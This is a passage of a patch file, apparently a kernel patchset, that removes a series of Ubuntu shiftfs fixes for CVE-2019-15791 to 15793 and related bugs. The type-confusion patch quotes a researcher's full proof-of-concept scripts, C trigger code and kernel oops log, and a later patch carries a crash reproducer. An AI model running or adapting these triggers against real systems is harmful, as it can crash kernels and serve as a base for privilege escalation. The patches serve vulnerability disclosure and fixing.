-498B4528 mov rax,[r13+0x28]
-4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
-0F8497000000 jz near 0xcc
-4989FC mov r12,rdi
-4989F6 mov r14,rsi
-
-This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
-think this corresponds to the load of "realfile->f_op->mmap" in the source code.
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15791
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 35 +++++++++++++++++++++--------------
- 1 file changed, 21 insertions(+), 14 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 0d6ce377b07c..9a6a7ad50b90 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1389,8 +1389,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd)
- 	return false;
- }
- 
--static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
--					  void __user *arg,
-+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 					  struct btrfs_ioctl_vol_args *v1,
- 					  struct btrfs_ioctl_vol_args_v2 *v2)
- {
-@@ -1404,7 +1403,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
- 	else
- 		ret = copy_to_user(arg, v2, sizeof(*v2));
- 
--	fdput(lfd);
- 	__close_fd(current->files, fd);
- 	kfree(v1);
- 	kfree(v2);
-@@ -1415,11 +1413,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
- static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 					  struct btrfs_ioctl_vol_args **b1,
- 					  struct btrfs_ioctl_vol_args_v2 **b2,
--					  struct fd *lfd,
- 					  int *newfd)
- {
- 	int oldfd, ret;
- 	struct fd src;
-+	struct fd lfd = {};
- 	struct btrfs_ioctl_vol_args *v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
- 
-@@ -1444,18 +1442,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	if (!src.file)
- 		return -EINVAL;
- 
--	ret = shiftfs_real_fdget(src.file, lfd);
--	fdput(src);
--	if (ret)
-+	ret = shiftfs_real_fdget(src.file, &lfd);
-+	if (ret) {
-+		fdput(src);
- 		return ret;
-+	}
-+
-+	/*
-+	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
-+	 * take a reference here to offset the one which will be put by
-+	 * __close_fd(), and make sure that reference is put on fdput(lfd).
-+	 */
-+	get_file(lfd.file);
-+	lfd.flags |= FDPUT_FPUT;
-+	fdput(src);
- 
--	*newfd = get_unused_fd_flags(lfd->file->f_flags);
-+	*newfd = get_unused_fd_flags(lfd.file->f_flags);
- 	if (*newfd < 0) {
--		fdput(*lfd);
-+		fdput(lfd);
- 		return *newfd;
- 	}
- 
--	fd_install(*newfd, lfd->file);
-+	fd_install(*newfd, lfd.file);
- 
- 	if (cmd == BTRFS_IOC_SNAP_CREATE) {
- 		v1->fd = *newfd;
-@@ -1468,7 +1476,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	}
- 
- 	if (ret)
--		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-+		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
- 
- 	return ret;
- }
-@@ -1482,13 +1490,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	int newfd = -EBADF;
- 	long err = 0, ret = 0;
- 	void __user *argp = (void __user *)arg;
--	struct fd btrfs_lfd = {};
- 	struct super_block *sb = file->f_path.dentry->d_sb;
- 	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
- 
- 	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
--					     &btrfs_lfd, &newfd);
-+					     &newfd);
- 	if (ret < 0)
- 		return ret;
- 
-@@ -1511,7 +1518,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	fdput(lowerfd);
- 
- out_restore:
--	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
-+	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
- 					     btrfs_v1, btrfs_v2);
- 	if (!ret)
- 		ret = err;
--- 
-2.39.2
-
-From 187086d532fb6b5cb7785ebcb5438e170f136491 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 1 Nov 2019 14:19:16 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent type confusion
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-Verify filesystem type in shiftfs_real_fdget().
-
-Quoting Jann Horn:
- #################### Bug 2: Type confusion ####################
-
- shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
- passes the resulting file* into shiftfs_real_fdget(), which does this:
-
- static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- {
-  struct shiftfs_file_info *file_info = file->private_data;
-  struct file *realfile = file_info->realfile;
-
-  lowerfd->flags = 0;
-  lowerfd->file = realfile;
-
-  /* Did the flags change since open? */
-  if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-   return shiftfs_change_flags(lowerfd->file, file->f_flags);
-
-  return 0;
- }
-
- file->private_data is a void* that points to a filesystem-dependent type; and
- some filesystems even use it to store a type-cast number instead of a pointer.
- The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
-
- As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
- (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
- offset 0x10), and I use that to cause a memory dereference somewhere around
- 0x4242:
-
- =======================================
- user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
- #!/bin/sh
- sync
- unshare -mUr ./run2.sh
- user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
- #!/bin/sh
- set -e
-
- mkdir -p mnt/tmpfs
- mkdir -p mnt/shiftfs
- mount -t tmpfs none mnt/tmpfs
- mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
- mount|grep shift
- gcc -o ioctl ioctl.c -Wall
- ./ioctl
- user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
- #include <sys/ioctl.h>
- #include <fcntl.h>
- #include <err.h>
- #include <unistd.h>
- #include <linux/btrfs.h>
- #include <sys/mman.h>
-
- int main(void) {
-   // make our vmacache sequence number something like 0x4242
-   for (int i=0; i<0x4242; i++) {
-     void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
-         MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
-     if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
-     munmap(x, 0x1000);
-   }
-
-   int root = open("mnt/shiftfs", O_RDONLY);
-   if (root == -1) err(1, "open shiftfs root");
-   int foofd = open("/proc/self/environ", O_RDONLY);
-   if (foofd == -1) err(1, "open foofd");
-   // trigger the confusion
-   struct btrfs_ioctl_vol_args iocarg = {
-     .fd = foofd
-   };
-   ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
- }
- user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
- none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
- /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
- [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
- [ 348.105060] #PF: supervisor read access in kernel mode
- [ 348.106573] #PF: error_code(0x0000) - not-present page
- [ 348.108102] PGD 0 P4D 0
- [ 348.108871] Oops: 0000 [#1] SMP PTI
- [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
- [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
- [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
- [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
- [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
- [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
- [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
- [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
- [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
- [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
- [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
- [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
- [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
- [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
- [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
- [ 348.143545] Call Trace:
- [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
- [ 348.145562] do_vfs_ioctl+0x407/0x670
- [ 348.146620] ? putname+0x4a/0x50
- [ 348.147556] ksys_ioctl+0x67/0x90
- [ 348.148514] __x64_sys_ioctl+0x1a/0x20
- [ 348.149593] do_syscall_64+0x5a/0x130
- [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
- [ 348.152108] RIP: 0033:0x7f77fa76767b
- [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
- [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
- [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
- [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
- [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
- [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
- [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
- [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
- [ 348.188617] CR2: 0000000000004289
- [ 348.189586] ---[ end trace dad859a1db86d660 ]---
- [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
- [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
- [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
- [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
- [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
- [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
- [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
- [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
- [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
- [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
- [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
- [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
- [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
- Killed
- user@ubuntu1910vm:~/shiftfs_confuse$
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-[ saf: use f_op->open instead as special inodes in shiftfs sbs
-  will not use shiftfs open f_ops ]
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15792
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 33 +++++++++++++++++++--------------
- 1 file changed, 19 insertions(+), 14 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9a6a7ad50b90..897e0163005e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1087,20 +1087,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
- 	return 0;
- }
- 
--static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
--{
--	struct file *realfile = file->private_data;
--
--	lowerfd->flags = 0;
--	lowerfd->file = realfile;
--
--	/* Did the flags change since open? */
--	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
--		return shiftfs_change_flags(lowerfd->file, file->f_flags);
--
--	return 0;
--}
--
- static int shiftfs_open(struct inode *inode, struct file *file)
- {
- 	struct file *realfile;
-@@ -1187,6 +1173,25 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
- 	return flags;
- }
- 
-+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-+{
-+	struct file *realfile;
-+
-+	if (file->f_op->open != shiftfs_open &&
-+	    file->f_op->open != shiftfs_dir_open)
-+		return -EINVAL;
-+
-+	realfile = file->private_data;
-+	lowerfd->flags = 0;
-+	lowerfd->file = realfile;
-+
-+	/* Did the flags change since open? */
-+	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-+		return shiftfs_change_flags(lowerfd->file, file->f_flags);
-+
-+	return 0;
-+}
-+
- static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
- {
- 	struct file *file = iocb->ki_filp;
--- 
-2.39.2
-
-From 7bb96158915054edeee67b13212cd19b8fff54bd Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 1 Nov 2019 13:35:25 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs
- operations
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-Several locations which shift ids translate user/group ids before
-performing operations in the lower filesystem are translating
-them into init_user_ns, whereas they should be translated into
-the s_user_ns for the lower filesystem. This will result in using
-ids other than the intended ones in the lower fs, which will
-likely not map into the shifts s_user_ns.
-
-Change these sites to use shift_k[ug]id() to do a translation
-into the s_user_ns of the lower filesystem.
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15793
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 43 +++++++++++++++++++++++--------------------
- 1 file changed, 23 insertions(+), 20 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 897e0163005e..04fba4689eb6 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -83,12 +83,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
- 	put_cred(newcred);
- }
- 
-+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
-+			 kuid_t kuid)
-+{
-+	uid_t uid = from_kuid(from, kuid);
-+	return make_kuid(to, uid);
-+}
-+
-+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
-+			 kgid_t kgid)
-+{
-+	gid_t gid = from_kgid(from, kgid);
-+	return make_kgid(to, gid);
-+}
-+
- static int shiftfs_override_object_creds(const struct super_block *sb,
- 					 const struct cred **oldcred,
- 					 struct cred **newcred,
- 					 struct dentry *dentry, umode_t mode,
- 					 bool hardlink)
- {
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	kuid_t fsuid = current_fsuid();
- 	kgid_t fsgid = current_fsgid();
- 
-@@ -100,8 +115,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
- 		return -ENOMEM;
- 	}
- 
--	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
--	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
-+	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
- 
- 	if (!hardlink) {
- 		int err = security_dentry_create_files_as(dentry, mode,
-@@ -117,20 +132,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
- 	return 0;
- }
- 
--static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
--			 kuid_t kuid)
--{
--	uid_t uid = from_kuid(from, kuid);
--	return make_kuid(to, uid);
--}
--
--static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
--			 kgid_t kgid)
--{
--	gid_t gid = from_kgid(from, kgid);
--	return make_kgid(to, gid);
--}
--
- static void shiftfs_copyattr(struct inode *from, struct inode *to)
- {
- 	struct user_namespace *from_ns = from->i_sb->s_user_ns;
-@@ -758,6 +759,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	struct iattr newattr;
- 	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
- 	err = setattr_prepare(dentry, attr);
-@@ -765,8 +767,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 		return err;
- 
- 	newattr = *attr;
--	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
--	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
-+	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
-+	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
- 
- 	/*
- 	 * mode change is for clearing setuid/setgid bits. Allow lower fs
-@@ -1356,6 +1358,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 					const struct cred **oldcred,
- 					struct cred **newcred)
- {
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	kuid_t fsuid = current_fsuid();
- 	kgid_t fsgid = current_fsgid();
- 
-@@ -1367,8 +1370,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 		return -ENOMEM;
- 	}
- 
--	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
--	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
-+	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
- 
- 	/* clear all caps to prevent bypassing capable() checks */
- 	cap_clear((*newcred)->cap_bset);
--- 
-2.39.2
-
-From f140d37a80df29e1746b9ba9a29cf5b505c6a70f Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 17 Jan 2020 16:17:06 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent lower dentries from going
- negative during unlink
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1860041
-
-All non-special files (For shiftfs this only includes fifos and - for
-this case - unix sockets - since we don't allow character and block
-devices to be created.) go through shiftfs_open() and have their dentry
-pinned through this codepath preventing it from going negative. But
-fifos don't use the shiftfs fops but rather use the pipefifo_fops which
-means they do not go through shiftfs_open() and thus don't have their
-dentry pinned that way. Thus, the lower dentries for such files can go
-negative on unlink causing segfaults. The following C program can be
-used to reproduce the crash:
-
- #include <stdio.h>
- #include <fcntl.h>
- #include <unistd.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <unistd.h>
- #include <stdlib.h>
-
- int main(int argc, char *argv[])
- {
-        struct stat stat;
-
-        unlink("./bbb");
-
-        int ret = mknod("./bbb", S_IFIFO|0666, 0);
-        if (ret < 0)
-                exit(1);
-
-        int fd = open("./bbb", O_RDWR);
-        if (fd < 0)
-                exit(2);
-
-        if (unlink("./bbb"))
-                exit(4);
-
-        fstat(fd, &stat);
-
-        return 0;
- }
-
-Similar to ecryptfs we need to dget() the lower dentry before calling
-vfs_unlink() on it and dput() it afterwards.
-
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 04fba4689eb6..3623d02b061e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -583,6 +583,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	int err;
- 	const struct cred *oldcred;
- 
-+	dget(lowerd);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
-@@ -602,6 +603,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	inode_unlock(loweri);
- 
- 	shiftfs_copyattr(loweri, dir);
-+	dput(lowerd);
- 
- 	return err;
- }
--- 
-2.39.2
-
-From c9d38b0997c70e60f89b31c83d1b7a1e375f28b1 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 10 Apr 2020 16:55:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: record correct creator credentials
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1872094
-
-When shiftfs is nested we failed to be able to create any files or
-access directories because we recorded the wrong creator credentials. We
-need to record the credentials of the creator of the lowers mark mount
-of shiftfs. Otherwise we aren't privileged wrt to the shiftfs layer in
-the nesting case. This is similar to how we always record the user
-namespace of the base filesystem.
-
-Suggested-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 17 +++++++++--------
- 1 file changed, 9 insertions(+), 8 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 3623d02b061e..5c39529d0a17 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2020,6 +2020,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			 * parent mark mountpoint.
- 			 */
- 			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
-+			sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		} else {
- 			sbinfo->mnt = mntget(path.mnt);
- 			dentry = dget(path.dentry);
-@@ -2028,16 +2029,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			 * are identical.
- 			 */
- 			sbinfo->passthrough_mark = sbinfo->passthrough;
--		}
- 
--		cred_tmp = prepare_creds();
--		if (!cred_tmp) {
--			err = -ENOMEM;
--			goto out_put_path;
-+			cred_tmp = prepare_creds();
-+			if (!cred_tmp) {
-+				err = -ENOMEM;
-+				goto out_put_path;
-+			}
-+			/* Don't override disk quota limits or use reserved space. */
-+			cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
-+			sbinfo->creator_cred = cred_tmp;
- 		}
--		/* Don't override disk quota limits or use reserved space. */
--		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
--		sbinfo->creator_cred = cred_tmp;
- 	} else {
- 		/*
- 		 * This leg executes if we're admin capable in the namespace,
--- 
-2.39.2
-
-From 485977eb4fb2701211275d28ca4fdbec87704a18 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 20 May 2020 13:44:27 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: let userns root destroy subvolumes
- from other users
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1879688
-
-Stéphane reported a bug found during NorthSec that makes heavy use of
-shiftfs. When a subvolume or snapshot is created as userns root in the
-container and then chowned to another user a delete as the root user
-will fail. The reason for this is that we drop all capabilities as a
-safety measure before calling btrfs ioctls. The only workable fix I
-could think of is to retain the CAP_DAC_OVERRIDE capability for the
-BTRFS_IOC_SNAP_DESTROY ioctl. All other solutions would be way more
-invasive.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 14 ++++++++++++--
- 1 file changed, 12 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 5c39529d0a17..5d88193b41db 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1356,7 +1356,7 @@ static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
- 	return ret;
- }
- 
--static int shiftfs_override_ioctl_creds(const struct super_block *sb,
-+static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
- 					const struct cred **oldcred,
- 					struct cred **newcred)
- {
-@@ -1381,6 +1381,16 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 	cap_clear((*newcred)->cap_inheritable);
- 	cap_clear((*newcred)->cap_permitted);
- 
-+	if (cmd == BTRFS_IOC_SNAP_DESTROY) {
-+		kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
-+		/*
-+		 * Allow the root user in the container to remove subvolumes
-+		 * from other users.
-+		 */
-+		if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
-+			cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
-+	}
-+
- 	put_cred(override_creds(*newcred));
- 	return 0;
- }
-@@ -1513,7 +1523,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	if (ret)
- 		goto out_restore;
- 
--	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
-+	ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
- 	if (ret)
- 		goto out_fdput;
- 
--- 
-2.39.2
-
-From e090464bdd744306b3b766b2a675ee26e934f1ef Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Mon, 15 Jun 2020 15:16:11 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs -- Fix build errors from missing
- fiemap definitions
-Cc: mpagano@gentoo.org
-
-shiftfs FTBFS with 5.8-rc1:
-
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c: In function 'shiftfs_fiemap':
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:13: error: dereferencing pointer to incomplete type 'struct fiemap_extent_info'
